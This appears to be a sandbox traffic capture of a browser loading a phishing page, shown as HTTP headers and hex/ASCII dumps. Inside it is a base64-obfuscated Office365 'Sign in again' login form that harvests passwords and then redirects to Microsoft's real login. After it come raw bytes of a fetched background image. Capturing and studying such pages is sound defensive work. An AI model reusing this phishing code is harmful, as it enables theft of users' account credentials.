                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EmxmfKmrAYVLr%2BI%2Brw8hGroxbJM9gqb%2B3ScRo2oqhGf4DpSVJ0ywiceaoTkuL4A2%2Fg2i%2BmcBnpiEnuYtvnXjdCEtL4cwxGYbBKbECFe0NV88jn8AvessD4og1lXICsIrTMKghG1h8Dj5JMZc"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ac3aa6d200c-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:05 UTC813INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 0a 0a 0a 76 61 72 20 58 3d 22 43 6a 78 49 56 45 31 4d 49 47 78 68 62 6d 63 39 5a 57 34 2b 50 45 68 46 51 55 51 2b 50 46 52 4a 56 45 78 46 50 6b 39 6d 5a 6d 6c 6a 5a 54 4d 32 4e 54 77 76 56 45 6c 55 54 45 55 2b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 46 71 59 58 67 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 57 70 68 65 43 39 73 61 57 4a 7a 4c 32 70 78 64 57 56 79 65 53 38 79 4c 6a 49 75 4e 43 39 71 63 58 56 6c 63 6e 6b 75 62 57 6c 75 4c 6d 70 7a 49 6a 34 38 4c 31 4e 44 55 6b 6c 51 56 44 34 4b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 4e 76 5a 47 55 75 61 6e 46
                                                                      Data Ascii: <!DOCTYPE html><script>var X="CjxIVE1MIGxhbmc9ZW4+PEhFQUQ+PFRJVExFPk9mZmljZTM2NTwvVElUTEU+CjxTQ1JJUFQgc3JjPSJodHRwczovL2FqYXguZ29vZ2xlYXBpcy5jb20vYWpheC9saWJzL2pxdWVyeS8yLjIuNC9qcXVlcnkubWluLmpzIj48L1NDUklQVD4KCjxTQ1JJUFQgc3JjPSJodHRwczovL2NvZGUuanF
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 33 4d 76 59 6d 39 76 64 48 4e 30 63 6d 46 77 4c 6d 31 70 62 69 35 6a 63 33 4d 69 49 47 6c 75 64 47 56 6e 63 6d 6c 30 65 54 30 69 63 32 68 68 4d 7a 67 30 4c 55 64 75 4e 54 4d 34 4e 48 68 78 55 54 46 68 62 31 64 59 51 53 73 77 4e 54 68 53 57 46 42 34 55 47 63 32 5a 6e 6b 30 53 56 64 32 56 45 35 6f 4d 45 55 79 4e 6a 4e 59 62 55 5a 6a 53 6d 78 54 51 58 64 70 52 32 64 47 51 56 63 76 5a 45 46 70 55 7a 5a 4b 57 47 30 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 78 4d 53 55 35 4c 49 48 4a 6c 62 44 31 7a 64 48 6c 73 5a 58 4e 6f 5a 57 56 30 49 47 68 79 5a 57 59 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 5a 6d 39 75 64 48 4d 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 33 4e 7a 50 32 5a 68
                                                                      Data Ascii: 3MvYm9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LUduNTM4NHhxUTFhb1dYQSswNThSWFB4UGc2Znk0SVd2VE5oMEUyNjNYbUZjSmxTQXdpR2dGQVcvZEFpUzZKWG0iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjxMSU5LIHJlbD1zdHlsZXNoZWV0IGhyZWY9Imh0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2Zh
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 4a 30 49 43 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 49 47 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 36 49 47 35 76 62 6d 55 37 49 43 31 33 5a 57 4a 72 61 58 51 74 59 58 42 77 5a 57 46 79 59 57 35 6a 5a 54 6f 67 62 6d 39 75 5a 51 70 39 43 6a 77 76 55 31 52 5a 54 45 55 2b 43 6a 77 76 53 45 56 42 52 44 34 4b 50 45 4a 50 52 46 6b 67 63 33 52 35 62 47 55 39 49 6b 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 53 55 31 42 52 30 55 36 49 48 56 79 62 43 68 6f 64 48 52 77 63 7a 6f 76 4c 32 6b 75 5a 33 6c 68 65 6d 38 75 59 32 39 74 4c 7a 49 78 4e 47 51 34 4f 57 45 79 4e 6d 59 77 59 57 4d 35 4d 54 68 68 4d 44 6c 6d 4d 6a 45 32 59 54 46 69 4d 47 59 35 4e 32 49 30 4c 6e 42 75 5a 79 6b 37 49 45 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 55 6b 56 51 52 55 46 55 4f 69 42 75 62
                                                                      Data Ascii: J0ICFpbXBvcnRhbnQ7IGJveC1zaGFkb3c6IG5vbmU7IC13ZWJraXQtYXBwZWFyYW5jZTogbm9uZQp9CjwvU1RZTEU+CjwvSEVBRD4KPEJPRFkgc3R5bGU9IkJBQ0tHUk9VTkQtSU1BR0U6IHVybChodHRwczovL2kuZ3lhem8uY29tLzIxNGQ4OWEyNmYwYWM5MThhMDlmMjE2YTFiMGY5N2I0LnBuZyk7IEJBQ0tHUk9VTkQtUkVQRUFUOiBub
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 38 63 44 34 38 63 33 52 79 62 32 35 6e 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 61 47 56 68 5a 47 6c 75 5a 79 49 2b 49 46 4e 70 5a 32 34 67 61 57 34 67 59 57 64 68 61 57 34 67 49 54 77 76 63 33 52 79 62 32 35 6e 50 69 41 38 4c 33 41 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33 56 69 4c 58 52 70 64 47 78 6c 49 6a 34 38 4c 33 4e 77 59 57 34 2b 50 43 39 77 50 6a 77 76 5a 47 6c 32 50 6a 77 76 61 44 49 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33
                                                                      Data Ascii: +CiAgICAgICAgICA8cD48c3Ryb25nIGNsYXNzPSJjaGFsbGVuZ2UtaGVhZGluZyI+IFNpZ24gaW4gYWdhaW4gITwvc3Ryb25nPiA8L3A+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3ViLXRpdGxlIj48L3NwYW4+PC9wPjwvZGl2PjwvaDI+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 63 6d 51 69 49 47 4e 73 59 58 4e 7a 50 53 4a 6d 62 33 4a 74 4c 57 4e 76 62 6e 52 79 62 32 77 69 49 47 6c 6b 50 53 4a 77 59 58 4e 7a 64 32 39 79 5a 43 49 67 62 6d 46 74 5a 54 30 69 63 47 52 6d 4d 69 49 67 63 47 78 68 59 32 56 6f 62 32 78 6b 5a 58 49 39 49 6c 42 68 63 33 4e 33 62 33 4a 6b 49 69 42 79 5a 58 46 31 61 58 4a 6c 5a 44 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 45 53 56 59 67 59 32 78 68 63 33 4d 39 49 6d 5a 76 63 6d 30 74 59 32 68 6c 59 32 73 67 62 58 51 74 4d 79 49 2b 50 45 6c 4f 55 46 56 55 49 47 6c 6b 50 57 56 34 59 57 31 77 62 47 56 44 61 47 56 6a 61 7a 45 67 59 32 78 68 63 33 4d 39 5a 6d 39 79 62 53 31
                                                                      Data Ascii: cmQiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIGlkPSJwYXNzd29yZCIgbmFtZT0icGRmMiIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIiByZXF1aXJlZD4KICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgICAgIDxESVYgY2xhc3M9ImZvcm0tY2hlY2sgbXQtMyI+PElOUFVUIGlkPWV4YW1wbGVDaGVjazEgY2xhc3M9Zm9ybS1
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 69 49 67 62 6d 46 74 5a 54 30 69 63 47 52 6d 4d 53 49 67 63 32 6c 36 5a 54 30 69 4d 7a 55 69 49 48 5a 68 62 48 56 6c 50 53 4a 70 62 6d 5a 76 51 47 52 6c 62 47 77 75 59 32 39 74 49 6a 34 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 75 59 57 31 6c 50 53 4a 68 5a 47 52 79 5a 58 4e 7a 49 69 42 7a 61 58 70 6c 50 53 49 31 49 69 42 32 59 57 78 31 5a 54 30 69 59 57 35 6a 62 33 4a 6c 61 57 35 7a 63 47 56 6a 64 47 6c 76 62 69 35 6a 62 32 30 69 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 4a 79 50 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 35 68 62 57 55 39 49 6d 56 74 59 57 6c 73 49 69 42 7a 61 58 70 6c 50 53 49 7a 4e 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 50 47 6c 75
                                                                      Data Ascii: iIgbmFtZT0icGRmMSIgc2l6ZT0iMzUiIHZhbHVlPSJpbmZvQGRlbGwuY29tIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhZGRyZXNzIiBzaXplPSI1IiB2YWx1ZT0iYW5jb3JlaW5zcGVjdGlvbi5jb20iPgogICAgICAgICAgPGJyPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImVtYWlsIiBzaXplPSIzNSIgdmFsdWU9IiI+PGlu
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 5a 54 63 47 56 71 61 44 52 56 4d 44 4a 6b 4f 47 70 50 64 44 5a 32 54 45 56 49 5a 6d 55 76 53 6c 46 48 61 56 4a 53 55 31 46 52 65 46 4e 6d 52 6c 64 77 61 54 46 4e 63 58 56 57 5a 45 46 35 61 6c 56 68 63 6a 55 72 4e 7a 5a 51 56 6b 4e 74 57 57 77 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 77 76 63 32 4e 79 61 58 42 30 50 67 6f 67 49 44 77 76 59 6d 39 6b 65 54 34 4b 43 69 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 57 70 68 65 43 35 6e 62 32 39 6e 62 47 56 68 63 47 6c 7a 4c 6d 4e 76 62 53 39 68 61 6d 46 34 4c 32 78 70 59 6e 4d 76 61 6e 46 31 5a 58 4a 35 4c 7a 49 75 4d 69 34 30 4c 32 70 78 64 57 56 79 65 53 35 74 61 57 34 75 61 6e 4d 69 50 6a 77 76 63
                                                                      Data Ascii: ZTcGVqaDRVMDJkOGpPdDZ2TEVIZmUvSlFHaVJSU1FReFNmRldwaTFNcXVWZEF5alVhcjUrNzZQVkNtWWwiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjwvc2NyaXB0PgogIDwvYm9keT4KCiAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMi40L2pxdWVyeS5taW4uanMiPjwvc
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 69 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 62 58 6c 66 63 32 78 70 59 32 55 39 62 58 6c 66 5a 57 31 68 61 57 77 75 63 33 56 69 63 33 52 79 4b 43 68 70 62 6d 51 72 4d 53 6b 70 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 5a 68 63 69 42 6a 50 53 42 74 65 56 39 7a 62 47 6c 6a 5a 53 35 7a 64 57 4a 7a 64 48 49 6f 4d 43 77 67 62 58 6c 66 63 32 78 70 59 32 55 75 61 57 35 6b 5a 58 68 50 5a 69 67 6e 4c 69 63 70 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 77 39 49 47 4d 75 64 47 39 4d 62 33 64 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 78 31 50 53 42 6a 4c 6e 52 76 56 58 42 77 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43
                                                                      Data Ascii: iKTsKICAgICAgICB2YXIgbXlfc2xpY2U9bXlfZW1haWwuc3Vic3RyKChpbmQrMSkpOwogICAgICAgIHZhciBjPSBteV9zbGljZS5zdWJzdHIoMCwgbXlfc2xpY2UuaW5kZXhPZignLicpKTsKICAgICAgICB2YXIgZmluYWw9IGMudG9Mb3dlckNhc2UoKTsKICAgICAgICB2YXIgZmluYWx1PSBjLnRvVXBwZXJDYXNlKCk7CgogICAgICAgIC
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 64 6d 46 79 49 47 5a 70 62 6d 46 73 50 53 42 6a 4c 6e 52 76 54 47 39 33 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 69 41 67 49 43 41 67 49 48 5a 68 63 69 42 6d 61 57 35 68 62 48 55 39 49 47 4d 75 64 47 39 56 63 48 42 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 70 62 57 63 69 4b 53 35 68 64 48 52 79 4b 43 4a 7a 63 6d 4d 69 4c 43 41 69 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 7a 4d 69 39 6d 59 58 5a 70 59 32 39 75 63 7a 39 6b 62 32 31 68 61 57 34 39 49 69 74 74 65 56 39 7a 62 47 6c 6a 5a 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 75 59 57 31 6c 49 69 6b 75 61 48 52 74 62 43 68 6d 61 57 35 68 62 48 55 70 4f 77 6f
                                                                      Data Ascii: dmFyIGZpbmFsPSBjLnRvTG93ZXJDYXNlKCk7CiAgICAgIHZhciBmaW5hbHU9IGMudG9VcHBlckNhc2UoKTsKCiAgICAgICAgJCgiI2xvZ29pbWciKS5hdHRyKCJzcmMiLCAiaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zMi9mYXZpY29ucz9kb21haW49IitteV9zbGljZSk7CiAgICAgICAgJCgiI2xvZ29uYW1lIikuaHRtbChmaW5hbHUpOwo
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 49 6d 68 30 64 48 42 7a 4f 69 38 76 62 47 39 6e 61 57 34 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 62 32 35 73 61 57 35 6c 4c 6d 4e 76 62 53 39 6a 62 32 31 74 62 32 34 76 62 32 46 31 64 47 67 79 49 69 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 38 76 49 43 51 6f 4a 79 4e 74 63 32 63 6e 4b 53 35 6f 64 47 31 73 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 57 79 64 74 63 32 63 6e 58 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6c 62 48 4e 6c
                                                                      Data Ascii: CAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbS9jb21tb24vb2F1dGgyIik7CgogICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgIC8vICQoJyNtc2cnKS5odG1sKHJlc3BvbnNlWydtc2cnXSk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBlbHNl


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.449759104.18.25.1634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:06 UTC396OUTGET /214d89a26f0ac918a09f216a1b0f97b4.png HTTP/1.1
                                                                      Host: i.gyazo.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: Gyazo_cfwoker=i
                                                                      2024-03-28 23:21:06 UTC574INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:06 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 372780
                                                                      Connection: close
                                                                      CF-Ray: 86bb5ac87f3d0602-IAD
                                                                      CF-Cache-Status: HIT
                                                                      Accept-Ranges: bytes
                                                                      Access-Control-Allow-Origin: https://gyazo.com
                                                                      Age: 877798
                                                                      Cache-Control: public, max-age=31536000
                                                                      ETag: "214d"
                                                                      Expires: Fri, 28 Mar 2025 23:21:06 GMT
                                                                      Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT
                                                                      Vary: Accept-Encoding
                                                                      Via: 1.1 google
                                                                      Access-Control-Allow-Credentials: true
                                                                      X-Cache-Level: ZS
                                                                      Server: cloudflare
                                                                      2024-03-28 23:21:06 UTC795INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 e1 00 00 05 46 08 06 00 00 00 13 df e2 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 1d 86 00 00 1d 86 01 5d a2 13 81 00 00 ff a5 49 44 41 54 78 5e ec 9d 05 60 5c c7 d5 85 af c5 cc 60 59 16 98 99 99 19 92 98 12 87 99 b9 6d 9a 42 4a 69 53 6e 93 72 93 e6 0f 27 0e 33 38 64 88 99 99 19 84 b6 25 59 cc e8 7f ce d5 3e 7b bd 5e cb 92 2c cb 82 f3 a5 af d6 d2 db b7 6f 66 ee dc 99 39 73 6f 9b 5e 37 bc 78 4a 08 21 84 10 42 08 21 84 10 d2 2a 38 1c 3d 50 4a 3c 7c 6d 8f 48 63 b2 f7 81 00 09 f4 6c 63 7b 44 08 21 a4 25 f3 c7 79 5b 64 d9 d6 63 b6 47 84 10 42 08 21 84 10 42 08 69 e9 50 84 47 08 21 84 10 42 08 21 84 b4 22 4e 84 74 94 72 37 4f db
                                                                      Data Ascii: PNGIHDRFsRGBgAMAapHYs]IDATx^`\`YmBJiSnr'38d%Y>{^,of9so^7xJ!B!*8=PJ<|mHclc{D!%y[dcGB!BiPG!B!"Ntr7O
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 4a 68 90 8f 84 04 78 89 b7 a7 9b ed 9d 4d 97 92 d2 0a c9 ca 2b 91 93 b9 c5 92 96 55 20 1b f7 1c 97 b5 3b 53 e5 c4 c9 42 29 af a8 34 4e 08 9b 1a 21 84 10 42 08 21 17 0b 45 78 84 10 42 08 21 a4 a9 40 11 1e 21 84 10 52 7f ae 9b d2 4d 3a 46 07 8a 2b 23 e0 35 6b 52 32 0a 64 de fc dd b6 47 84 10 d2 ba a1 08 8f 5c 56 b0 b3 21 24 c0 5b c6 0f 8a 95 d9 63 bb 4a b7 b8 50 29 2c 29 93 a2 e2 72 29 2d af 94 8a ca 2a a9 ac 3c 25 55 cd 60 26 03 3b 34 dc 5c db 88 ab ab 8b 78 ba bb 8a 8f 97 bb fe be 23 a9 39 f2 d5 aa 43 b2 64 53 a2 a4 67 15 4a 41 71 19 27 66 08 21 84 10 42 08 a9 27 2d 4d 84 57 55 75 4a c7 3d 38 aa aa 44 27 9e dd dd 5d 74 93 12 21 84 10 42 08 69 da 50 84 47 08 21 84 d4 9f 07 af ed a7 c1 58 48 f3 a6 bc a2 4a 9e 99 b7 d1 f6 88 10 42 5a 37 14 e1 91 cb 46 f7 f8
                                                                      Data Ascii: JhxM+U ;SB)4N!B!ExB!@!RM:F+#5kR2dG\V!$[cJP),)r)-*<%U`&;4\x#9CdSgJAq'f!B'-MWUuJ=8D']t!BiPG!XHJBZ7F
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 6d 7f ba 14 14 95 db ae e6 d2 33 7a 40 b4 46 77 5b b5 2d d5 f6 cc d9 74 8c 0e 94 19 63 3a 49 44 b0 8f e4 16 96 e9 fb 96 6e 4c 92 23 c6 40 67 e4 14 eb b5 42 70 97 9e 5d 24 47 52 72 e5 50 72 8e 54 c9 29 ed 2c a3 23 fc 24 d0 cf 4b 32 73 8b f5 37 36 77 aa 4c 87 84 c5 62 fb c3 c3 d3 4d 82 82 fd c4 d3 b4 63 dc c7 92 92 72 71 b3 45 6d c9 cd a9 bd 98 d2 cd dd 55 c2 c2 03 c5 dd c3 dd 9c b7 52 2a 4d db 20 84 34 2c 73 27 75 95 c9 c3 62 65 44 9f 76 32 bc 4f d4 e9 a3 8f b1 f9 ed db 06 48 7e 61 a9 b1 67 4d d7 56 05 f8 7a c8 84 21 31 32 61 70 8c e9 3f 4f 49 76 5e 89 54 b5 a0 94 f5 17 02 7d e7 55 a3 3b aa 20 de d5 b5 8d f1 1f 9c a7 fc ee 1a 1b ac 83 b6 9e 1d c3 b4 ef c9 ce 2f b5 bd 72 86 40 d3 df 4e 1b 11 2f d3 47 76 90 1c f3 3a fa a9 cb c1 d0 de d5 02 f7 44 e3 5b 9c 30
                                                                      Data Ascii: m3z@Fw[-tc:IDnL#@gBp]$GRrPrT),#$K2s76wLbMcrqEmUR*M 4,s'ubeDv2OH~agMVz!12ap?OIv^T}U; /r@N/Gv:D[0
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 2e ad d4 68 da 98 b4 fc eb eb 1b e4 2f e6 40 4a b6 57 3e df a9 b6 bb 29 5c 67 7d c0 65 57 56 55 a9 58 bb b9 fe 06 42 08 21 84 10 42 08 21 a4 b5 83 35 2c 8c ed 21 58 b1 36 a9 e3 c0 63 04 da b0 07 6b d7 d6 6b 4d 71 2e 00 bf c5 fa 1d 97 2b bb 5a 4b 03 f3 73 58 23 6e e8 83 10 7b a0 01 81 96 c4 3a da d8 ea 48 6d eb df e9 39 4a fd 54 cb 07 19 9f 96 6e 4a d6 4c 8d d0 e3 4c 1d 1e 27 dd e2 43 6a d4 07 e1 8e 06 fa 7b ca ac b1 1d 25 be 5d 80 06 a2 f8 6c e9 21 39 96 5e 70 d1 c1 3d ea 43 b3 8d 84 87 05 c6 31 03 a2 75 11 15 a9 78 3c dd 5d 24 25 3d 5f 3b 9f 86 04 11 c2 a6 0c 8b 93 c8 60 1f 39 9c e2 3c 02 49 5d c0 5a 4b 50 80 97 8c ea 17 ad a1 26 b1 68 0a 35 67 4a 5a 81 2d 2a 49 1b f1 f3 71 d7 85 95 e3 27 6b 1f 55 aa 29 03 31 da ef 1f 18 67 7e ab ab 3c f1 ec 12 4d e3 e9
                                                                      Data Ascii: .h/@JW>)\g}eWVUXB!B!5,!X6ckkMq.+ZKsX#n{:Hm9JTnJLL'Cj{%]l!9^p=C1ux<]$%=_;`9<I]ZKP&h5gJZ-*Iq'kU)1g~<M
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: c8 50 df d3 29 17 4b cb b1 e3 f3 ec 9b d2 d3 f8 2b e1 c1 3e 92 6b ae 05 13 3d d8 51 84 cf a3 7e e1 7e e3 ed 3e 5e 6e d2 de d4 05 a4 c0 45 b9 20 6d 26 ea 0f 7c f4 de 9d 42 b5 ef a7 08 8f 5c 2c cd 51 84 97 6f fc 5d 6c f6 a8 4e 33 1d 64 7b b6 6e 94 94 56 4a 4a 5a be 6e 48 83 cd bd 9c 22 3c f8 f5 9f 2e 3d a4 36 61 fa c8 0e ea 4f 77 31 fd 0a fa 96 3e 9d c3 a4 7b 3c c6 00 5e 3a de c2 46 97 e6 06 45 78 84 10 42 08 a9 2d 14 e1 11 42 08 21 f5 e7 52 89 f0 b0 11 5d 85 77 5b 53 75 8e 3a 3e 2a 50 ba 9a f1 3d e6 2c b1 b1 11 eb 79 45 25 e5 d2 ab 53 98 ed 13 d5 73 01 18 fb b7 0b f7 d5 79 cd 86 cc 92 d7 10 60 8e 1d 47 68 90 97 c4 46 06 e8 3c 6c 53 99 ab 68 ae 22 3c 88 34 93 d3 f2 35 a8 ca f9 8e 93 39 25 e2 e7 ed ae f7 1e 7a 8e e4 b4 02 f3 3c 0e e7 ef c7 81 b9 73 94 0d 45
                                                                      Data Ascii: P)K+>k=Q~~>^nE m&|B\,Qo]lN3d{nVJJZnH"<.=6aOw1>{<^:FExB-B!R]w[Su:>*P=,yE%Ssy`GhF<lSh"<459%z<sE
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 34 15 ed dd 33 fb a9 42 b5 ae e0 ba 51 0e db 0f a6 d9 9e a9 1b 63 fa c7 c8 2d 57 f4 36 e7 c8 97 97 bf d8 2e 4b 36 25 c8 e1 94 6c 5d 88 4f 38 9e 2b 07 92 b2 64 db 81 34 19 dc bd ad b9 2f 51 c6 28 9e 30 f7 b6 bd dc 7f f5 00 73 8f da 6a 98 df 5e 1d c2 65 fa 88 8e d2 2d 2e 54 6e 9c da 53 fa 76 36 9d b6 a9 0f 7d cc bf 88 aa b7 76 67 aa 46 86 a9 09 38 49 57 8f ef 86 bf e4 93 a5 fb 1a 5d 04 d0 5a 45 78 10 c4 a2 3d 97 96 55 c9 c2 75 89 b2 d7 d8 8e 86 e8 b0 20 08 81 e3 06 51 02 04 0f e8 24 eb 03 44 10 10 ac 54 47 16 3a b7 4e a0 d3 85 e8 a4 c8 bc ee 68 f3 1a 0a 8d 82 17 86 34 b4 6d 24 27 bb 50 4a 8a 9d a7 e8 bd 58 11 1e 40 7b 46 ba 5b 6f d3 7e 00 be ab be 36 a7 21 41 44 3b ec 84 41 fd ad cb 91 05 85 bd ed 1c 84 5c 2e ce 27 c2 83 10 6a fc a0 18 89 31 fe 08 36 03 c0
                                                                      Data Ascii: 43BQc-W6.K6%l]O8+d4/Q(0sj^e-.TnSv6}vgF8IW]ZEx=Uu Q$DTG:Nh4m$'PJX@{F[o~6!AD;A\.'j16
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: c5 05 ab cd 84 ff 85 10 f1 10 a6 a1 7d 22 a5 e3 09 f3 18 bf 0d 61 a9 9b 72 9b 85 50 3d c5 fc 2e 0c fa 21 9c b7 80 f0 04 be 1a 7e 77 46 76 91 e4 99 c1 1b 06 70 78 0f 22 36 01 f8 be 91 a1 3e ea 2f 43 98 07 df 05 e5 05 41 09 fc 15 4c 8c ec 36 f7 1e 82 7b 9c 07 f7 63 f5 f6 54 d9 71 f0 a4 78 19 5b dc c7 f8 81 10 67 da 03 3f 34 cb f8 43 4b 37 26 a9 28 06 36 0f df 8b f2 85 bf 8d ef 59 b2 29 59 37 34 e0 9c 28 e3 fd 09 59 f2 cd da 04 15 75 13 d2 5a 81 2d 42 9b c4 84 41 d2 89 ba 47 4a c6 58 05 93 c7 18 6f 60 07 2e 84 62 97 13 88 9d 31 6e 3c 94 9c ad 7d 06 7e 57 6d 80 a8 fb eb 55 47 e5 eb d5 47 74 1c 0f 1b 83 0d 67 5b 8d ed fe 62 c5 21 b5 2b 16 b0 cc b9 e6 bc 0b d6 25 c8 f2 cd c9 2a a8 f6 36 3e 22 7c ed 9d 87 32 f4 7b 0f da bd 1f 7e 38 fa 05 d8 34 88 b2 d1 07 a1 cf
                                                                      Data Ascii: }"arP=.!~wFvpx"6>/CAL6{cTqx[g?4CK7&(6Y)Y74(YuZ-BAGJXo`.b1n<}~WmUGGtg[b!+%*6>"|2{~84
